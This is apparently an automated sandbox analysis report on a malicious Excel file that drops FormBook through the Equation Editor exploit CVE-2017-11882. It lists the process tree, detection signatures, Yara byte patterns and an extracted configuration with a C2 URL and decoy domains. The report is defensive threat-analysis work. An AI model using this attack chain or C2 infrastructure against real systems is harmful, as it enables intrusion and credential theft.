Play interactive tour

Edit tour

Analysis Report Doc7656.xlsx

Overview

General Information

Sample Name:	Doc7656.xlsx
Analysis ID:	361319
MD5:	a7b89c653a674b9433e8442d59a0ff5e
SHA1:	351013e428322c0279dea23376601a5be5cfb664
SHA256:	26b10c1613e2ca9b53da75d03f5b8a8e11d90ba7cb55e4d499e749ffcfbf5a42
Tags:	VelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: File Dropped By EQNEDT32EXE

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Contains functionality to hide a thread from the debugger

Drops PE files to the user root directory

Hides threads from debuggers

Injects a PE file into a foreign processes

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: Executables Started in Suspicious Folder

Sigma detected: Execution in Non-Executable Folder

Sigma detected: Suspicious Program Location Process Starts

Tries to detect virtualization through RDTSC time measurements

Adds / modifies Windows certificates

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara signature match

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 1844 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

EQNEDT32.EXE (PID: 2504 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 2688 cmdline: 'C:\Users\Public\vbc.exe' MD5: 5E56329C37A437E87B485914FD524AA9)

cmd.exe (PID: 2864 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: AD7B9C14083B52BC532FBA5948342B98)

timeout.exe (PID: 3032 cmdline: timeout 1 MD5: 419A5EF8D76693048E4D6F79A5C875AE)

vbc.exe (PID: 3052 cmdline: C:\Users\Public\vbc.exe MD5: 5E56329C37A437E87B485914FD524AA9)

vbc.exe (PID: 2968 cmdline: C:\Users\Public\vbc.exe MD5: 5E56329C37A437E87B485914FD524AA9)

vbc.exe (PID: 2964 cmdline: C:\Users\Public\vbc.exe MD5: 5E56329C37A437E87B485914FD524AA9)

explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)

colorcpl.exe (PID: 1572 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: 031183B7923637CBB3E99CBBE5E821CA)

cmd.exe (PID: 1756 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.mathlene.com/z65/"], "decoy": ["cdslbzj.com", "brentmigrogreens.com", "lisaswander.com", "circewallace.com", "shopwanderandwilderness.com", "itimewisely.com", "xuanyuancao.com", "xvideosindian2021.com", "elemekeji.store", "xmhaipei.com", "bikelockbd.com", "iranilink.com", "scrited.com", "2141cascaderdsw.com", "growingstack.com", "carbeloy.com", "nicolasghetti.com", "onshownails.com", "vietvi.com", "badboysbreaks.com", "pisharodielectronics.com", "waymo.website", "krav-granites.com", "30at.com", "makeflixdh.com", "barodaartistsexpo.com", "wlkq.asia", "prontovpn.net", "honorararzt-vermittlung.net", "canalceltic.icu", "ceinsusacperu.com", "thinkots.net", "thenewnormalconference.com", "ofetons.com", "epictradingco.com", "xn--tvfalasimesfilho-dwb.com", "healthxpertnutrition.com", "mrwhitefang.com", "portlandiaspanishschool.com", "thecorporatetoolbox.com", "recetas123.com", "enygmaecommerce.com", "alisavogue.com", "dywoqwppq.icu", "1yao1.com", "pedegooakbluffs.com", "boozespot.com", "crownupqueens.com", "thekspmarket.net", "pats-journal.com", "sewpristine.com", "xn--90ahjbhewfogb9i.xn--p1acf", "interimseek.com", "dgjinhone.com", "inservenet.com", "hottubmoverfranchise.com", "unikloo-official.com", "augforever.com", "roybernhard.com", "moderaclothingco.com", "showyourtv.com", "matematikciler.net", "denimsoulmarketing.com", "dettagliperu.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
0000000E.00000002.2376039080.0000000000180000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000E.00000002.2376039080.0000000000180000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000E.00000002.2376039080.0000000000180000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.2236122325.0000000000190000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.2236122325.0000000000190000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.2236122325.0000000000190000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.2236172142.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.2236172142.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.2236172142.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
0000000E.00000002.2375852028.0000000000080000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000E.00000002.2375852028.0000000000080000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000E.00000002.2375852028.0000000000080000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.2377749186.0000000003121000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.2377749186.0000000003121000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x10db8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x11022:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1cb45:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1c631:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1cc47:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1cdbf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x11a3a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1b8ac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x12733:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x227e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x237ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.2377749186.0000000003121000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1f8c9:$sqlite3step: 68 34 1C 7B E1 0x1f9dc:$sqlite3step: 68 34 1C 7B E1 0x1f8f8:$sqlite3text: 68 38 2A 90 C5 0x1fa1d:$sqlite3text: 68 38 2A 90 C5 0x1f90b:$sqlite3blob: 68 53 D8 7F 8C 0x1fa33:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.2236055627.00000000000E0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.2236055627.00000000000E0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.2236055627.00000000000E0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
0000000E.00000002.2376092143.00000000001B0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000E.00000002.2376092143.00000000001B0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000E.00000002.2376092143.00000000001B0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.2380975508.0000000003858000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.2380975508.0000000003858000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xa240:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa4aa:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x37c60:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x37eca:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15fcd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x439ed:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15ab9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x434d9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x160cf:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x43aef:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x16247:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x43c67:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xaec2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x388e2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x14d34:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x42754:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xbbbb:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x395db:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1bc6f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x4968f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1cc72:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.2380975508.0000000003858000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18d51:$sqlite3step: 68 34 1C 7B E1 0x18e64:$sqlite3step: 68 34 1C 7B E1 0x46771:$sqlite3step: 68 34 1C 7B E1 0x46884:$sqlite3step: 68 34 1C 7B E1 0x18d80:$sqlite3text: 68 38 2A 90 C5 0x18ea5:$sqlite3text: 68 38 2A 90 C5 0x467a0:$sqlite3text: 68 38 2A 90 C5 0x468c5:$sqlite3text: 68 38 2A 90 C5 0x18d93:$sqlite3blob: 68 53 D8 7F 8C 0x18ebb:$sqlite3blob: 68 53 D8 7F 8C 0x467b3:$sqlite3blob: 68 53 D8 7F 8C 0x468db:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
10.2.vbc.exe.400000.2.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
10.2.vbc.exe.400000.2.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ce8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8f52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14a75:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14561:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14b77:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14cef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x996a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x137dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa663:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a717:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b71a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
10.2.vbc.exe.400000.2.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x177f9:$sqlite3step: 68 34 1C 7B E1 0x1790c:$sqlite3step: 68 34 1C 7B E1 0x17828:$sqlite3text: 68 38 2A 90 C5 0x1794d:$sqlite3text: 68 38 2A 90 C5 0x1783b:$sqlite3blob: 68 53 D8 7F 8C 0x17963:$sqlite3blob: 68 53 D8 7F 8C
10.2.vbc.exe.400000.2.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
10.2.vbc.exe.400000.2.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
10.2.vbc.exe.400000.2.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2504, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2688

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2504, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\IMG-354635[1].exe

Sigma detected: Executables Started in Suspicious Folder

Show sources

Source: Process started

Sigma detected: Execution in Non-Executable Folder

Show sources

Source: Process started

Sigma detected: Suspicious Program Location Process Starts

Show sources

Source: Process started

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 10.2.vbc.exe.400000.2.unpack

Malware Configuration Extractor: FormBook {"C2 list": ["www.mathlene.com/z65/"], "decoy": ["cdslbzj.com", "brentmigrogreens.com", "lisaswander.com", "circewallace.com", "shopwanderandwilderness.com", "itimewisely.com", "xuanyuancao.com", "xvideosindian2021.com", "elemekeji.store", "xmhaipei.com", "bikelockbd.com", "iranilink.com", "scrited.com", "2141cascaderdsw.com", "growingstack.com", "carbeloy.com", "nicolasghetti.com", "onshownails.com", "vietvi.com", "badboysbreaks.com", "pisharodielectronics.com", "waymo.website", "krav-granites.com", "30at.com", "makeflixdh.com", "barodaartistsexpo.com", "wlkq.asia", "prontovpn.net", "honorararzt-vermittlung.net", "canalceltic.icu", "ceinsusacperu.com", "thinkots.net", "thenewnormalconference.com", "ofetons.com", "epictradingco.com", "xn--tvfalasimesfilho-dwb.com", "healthxpertnutrition.com", "mrwhitefang.com", "portlandiaspanishschool.com", "thecorporatetoolbox.com", "recetas123.com", "enygmaecommerce.com", "alisavogue.com", "dywoqwppq.icu", "1yao1.com", "pedegooakbluffs.com", "boozespot.com", "crownupqueens.com", "thekspmarket.net", "pats-journal.com", "sewpristine.com", "xn--90ahjbhewfogb9i.xn--p1acf", "interimseek.com", "dgjinhone.com", "inservenet.com", "hottubmoverfranchise.com", "unikloo-official.com", "augforever.com", "roybernhard.com", "moderaclothingco.com", "showyourtv.com", "matematikciler.net", "denimsoulmarketing.com", "dettagliperu.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: Doc7656.xlsx

ReversingLabs: Detection: 23%

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000E.00000002.2376039080.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2236122325.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2236172142.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2375852028.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2377749186.0000000003121000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2236055627.00000000000E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2376092143.00000000001B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2380975508.0000000003858000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 10.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE

Source: 10.2.vbc.exe.1c0000.1.unpack	Avira: Label: TR/Dropper.Gen
Source: 14.2.colorcpl.exe.bc0000.4.unpack	Avira: Label: TR/Dropper.Gen
Source: 10.2.vbc.exe.6d1db0.3.unpack	Avira: Label: TR/Dropper.Gen
Source: 10.2.vbc.exe.400000.2.unpack	Avira: Label: TR/Crypt.XPACK.Gen2

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe

Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses insecure TLS / SSL version for HTTPS connection

Show sources

Source: unknown

HTTPS traffic detected: 99.86.159.103:443 -> 192.168.2.22:49178 version: TLS 1.0

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Uses secure TLS version for HTTPS connections

Show sources

Source: unknown

HTTPS traffic detected: 97.107.138.110:443 -> 192.168.2.22:49167 version: TLS 1.2

Binary contains paths to debug symbols

Show sources

Source:	Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb\| source: vbc.exe, 00000004.00000003.2203497479.0000000005720000.00000004.00000001.sdmp
Source:	Binary string: colorcpl.pdb source: vbc.exe, 0000000A.00000002.2236253130.00000000006B9000.00000004.00000020.sdmp
Source:	Binary string: \REGISTRY\USER\S-1-5-21-966771315-3019405637-367336477-1006_Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4vbc.PDB-F424491E3931}\Servererver32 source: vbc.exe, 00000004.00000002.2376319137.0000000000438000.00000004.00000001.sdmp
Source:	Binary string: CmicC:\Users\Public\vbc.PDB# source: vbc.exe, 00000004.00000002.2376319137.0000000000438000.00000004.00000001.sdmp
Source:	Binary string: :\Windows\mscorlib.pdbpdblib.pdb, source: vbc.exe, 00000004.00000002.2376278535.0000000000307000.00000004.00000020.sdmp
Source:	Binary string: C:\Users\Public\vbc.exe9405637-367336477-1006ic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbisualBasic.pdbLC source: vbc.exe, 00000004.00000002.2376319137.0000000000438000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Public\vbc.exe\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: vbc.exe, 00000004.00000002.2382793351.00000000056E5000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, colorcpl.exe
Source:	Binary string: CnpMjVisualBasic.pdb source: vbc.exe, 00000004.00000002.2376319137.0000000000438000.00000004.00000001.sdmp
Source:	Binary string: C(`1(PBjLC:\Windows\Microsoft.VisualBasic.pdb source: vbc.exe, 00000004.00000002.2376319137.0000000000438000.00000004.00000001.sdmp
Source:	Binary string: $/C:\Users\Public\vbc.PDB# source: vbc.exe, 00000004.00000002.2376319137.0000000000438000.00000004.00000001.sdmp
